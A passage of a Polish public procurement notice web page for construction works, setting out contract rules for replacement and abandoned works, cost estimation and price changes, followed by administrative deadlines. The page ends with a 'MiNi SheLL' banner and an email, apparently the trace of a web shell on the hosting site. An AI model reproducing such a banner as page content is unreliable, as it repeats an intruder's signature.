wykonywania robót nie zapewnią właściwej jakości wykonania przedmiotuUmowy) - na pisemny wniosek Wykonawcy, potwierdzony i zatwierdzony przez przedstawicielaZamawiającego - dopuszcza się wydłużenie terminu realizacji przedmiotu zamówienia o ilość dni, wktórych nie można było realizować przedmiotu Umowy ponad termin określony w § 6 ust.1 Umowy przyuwzględnieniu treści § 14 ust.7 i ust. 8 Umowy. 10. Zamawiający dopuszcza możliwość wystąpienia wtrakcie realizacji przedmiotu umowy konieczności wykonania robót zamiennych w stosunku do przewidzianych w dokumentacji projektowej robót podstawowych - w sytuacji, gdy wykonanie tychrobót będzie niezbędne dla prawidłowego tj. zgodnego z zasadami wiedzy technicznej i obowiązującymina dzień odbioru robót przepisami prawa wykonania przedmiotu umowy, określonego w § 1 ust. 1Umowy. Roboty zamienne - zostaną wykonane po sporządzeniu przez Kierownika Budowy protokołukonieczności wykonania robót zamiennych wraz ze wstępną kalkulacją ich wykonania - potwierdzonegoprzez Inspektora Nadzoru, a w przypadku ustanowienia nadzoru autorskiego również przez Projektantasprawującego nadzór autorski oraz po zatwierdzeniu przez Przedstawiciela Zamawiającego. Rozliczenierobót zamiennych w odniesieniu do robót podstawowych nastąpi na podstawie potwierdzonych przezInspektora Nadzoru obmiarów powykonawczych robót zamiennych, oraz sporządzonych na ichpodstawie kosztorysów różnicowych ( których wartość zostanie uwzględniona w stosunku do wartościprzedmiotu Umowy określonej w § 3 ust. 1 Umowy ) - sporządzonych w oparciu o następujące zasady: a)należy obliczyć cenę robót podstawowych - w oparciu o kosztorys robót podstawowych, b) należyobliczyć cenę robót zamiennych - w oparciu o kosztorys robót zamiennych, c) należy obliczyć różnicępomiędzy ceną robót podstawowych i ceną robót zamiennych - w oparciu o różnicę pomiędzy wartościąkosztorysu robót podstawowych i kosztorysu robót zamiennych. Obliczenia ceny robót podstawowychoraz ceny robót zamiennych należy dokonać w oparciu o następujące zasady: a) ceny jednostkowe robótpodstawowych i zamiennych - należy przyjąć z kosztorysu ofertowego złożonego przez Wykonawcę wpostępowaniu przetargowym - stanowiącym załącznik Nr 3 do Umowy zgodnie z § 3 ust. 2 Umowy, b) wprzypadku - gdy występują roboty, których nie można rozliczyć w oparciu o ceny jednostkowe robótzawartych w kosztorysie ofertowym - ceny jednostkowe robót zamiennych należy obliczyć przy użyciuśrednich składników cenotwórczych ( Rb-g, M, S, Kp, Z ) przyjętych z publikatorów ,,SEKOCENBUD" zkwartału poprzedzającego datę zawarcia Umowy - w oparciu o kosztorys robót zamiennych sporządzonymetodą szczegółową, zgodnie z nieobowiązującym rozporządzeniem Ministra Rozwoju Regionalnego iBudownictwa z dn.13 lipca 2001r.w sprawie metod kosztorysowania obiektów i robót budowlanych (Dz.U.2001 Nr 80 poz.867). Podstawą do określenia nakładów rzeczowych - niezbędnych do sporządzeniakosztorysu robót zamiennych sporządzonego metodą szczegółową będą w kolejności: a) normy zawarte wkosztorysie ofertowym złożonym przez Wykonawcę w postępowaniu przetargowym i stanowiącyzałącznik Nr 3 do Umowy, b) odpowiednie pozycje Katalogów Nakładów Rzeczowych (KNR-y) -zaakceptowane przez Inspektora Nadzoru, c) odpowiednie pozycje Katalogów Nakładów NormRzeczowych (KNNR-y) - zaakceptowane przez Inspektora Nadzoru, d) wycena indywidualna -zaakceptowana przez Inspektora Nadzoru. Ilość jednostek przedmiarowych robót, które miały byćpierwotnie wykonane (roboty podstawowe) - należy przyjąć z kosztorysu ofertowego złożonego przezWykonawcę w postępowaniu przetargowym, stanowiącym załącznik Nr 3 do Umowy . Ilość jednostekprzedmiarowych robót zamiennych, należy przyjąć w oparciu o faktyczną ilość wykonanych jednostek robót zamiennych - wynikających z dokonanych potwierdzonych przez Inspektora Nadzoru obmiarówpowykonawczych robót zamiennych. 11. Zamawiający dopuszcza możliwość rezygnacji z wykonaniapewnego zakresu robót przewidzianych w dokumentacji projektowej - w sytuacji, gdy ich wykonaniebędzie zbędne dla prawidłowego tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzieńodbioru robót przepisami prawa, wykonania przedmiotu umowy, określonego w § 1 ust. 1 Umowy.Roboty takie w dalszej części Umowy nazwane zostają robotami zaniechanymi. Roboty zaniechane -zostaną pominięte w realizacji po sporządzeniu przez Inspektora Nadzoru protokołu koniecznościpominięcia wykonania grupy robót podstawowych wraz ze wstępną kalkulacją ich wartości -potwierdzonego przez Przedstawiciela Zamawiającego, a w przypadku ustanowienia nadzoru autorskiegorównież przez Projektanta sprawującego nadzór autorski oraz przy parafowaniu przez KierownikaBudowy. Rozliczenie robót zaniechanych w odniesieniu do robót podstawowych nastąpi na podstawiekosztorysów robót zaniechanych (których wartość zostanie odliczona od wartości przedmiotu Umowy,określonej w § 3 ust. 1 Umowy ) - sporządzonych przez Inspektora Nadzoru i parafowanych przezKierownika Budowy w oparciu o następujące zasady: cenę robót zaniechanych - należy obliczyć woparciu o kosztorys robót zaniechanych, przyjmując ceny jednostkowe robót zaniechanych z kosztorysuofertowego złożonego przez Wykonawcę w postępowaniu przetargowym - stanowiącym załącznik Nr 3do Umowy. Ilość jednostek przedmiarowych robót zaniechanych - które miały być pierwotnie wykonane,należy przyjąć z kosztorysu ofertowego złożonego przez Wykonawcę w postępowaniu przetargowym -stanowiącym załącznik Nr 3 do Umowy zgodnie z § 3 ust. 2 Umowy. 12. Zamawiający dopuszcza zmianęwartości przedmiotu umowy określonej w § 3 ust. 1 Umowy w przypadku: a) konieczności wykonaniarobót budowlanych niewykraczających swym zakresem poza przedmiot zamówienia, określony w § 1 ust.1 Umowy, których ilość jednostek przedmiarowych wskazanych przez Zamawiającego w przedmiarzerobót( na podstawie którego Wykonawca sporządził kosztorys ofertowy i dokonał wyceny robót ) zostałazaniżona, b) potrzeby wykonania robót budowlanych niewykraczających swym zakresem poza przedmiotzamówienia określony w § 1 ust. 1 Umowy, które zostały pominięte w przedmiarze robót ( na podstawiektórego Wykonawca sporządził kosztorys ofertowy i dokonał wyceny robót ), a których wykonanie jestkonieczne do zrealizowania i oddania do użytkowania przedmiotu zamówienia określonego w § 1 ust. 1Umowy, c) wystąpienia w trakcie realizacji przedmiotu umowy konieczności wykonania robótzamiennych w stosunku do przewidzianych w dokumentacji projektowej robót podstawowych - wsytuacji gdy wykonanie tych robót będzie niezbędne dla prawidłowego tj. zgodnego z zasadami wiedzytechnicznej i obowiązującymi na dzień odbioru robót przepisami prawa, wykonania przedmiotu umowy,określonego w § 1 ust.1 Umowy, d) rezygnacji z wykonania pewnego zakresu robót przewidzianych wdokumentacji projektowej - w sytuacji, gdy ich wykonanie będzie zbędne dla prawidłowego tj. zgodnegoz zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami prawa wykonania przedmiotu umowy, określonego w § 1 ust.1 Umowy, e) zawyżonej ilości jednostek przedmiarowychwskazanych przez Zamawiającego w przedmiarze robót (na podstawie którego Wykonawca sporządziłkosztorys ofertowy i dokonał wyceny robót) - w odniesieniu do rzeczywistej ilości jednostek robótwykonanych przez Wykonawcę. 13. Zamawiający dopuszcza powierzenie nadzoru inwestorskiego -,,Inwestorowi Zastępczemu". 14. Wszelkie zmiany Umowy wymagają formy pisemnej pod rygoremnieważności.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-07-10</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com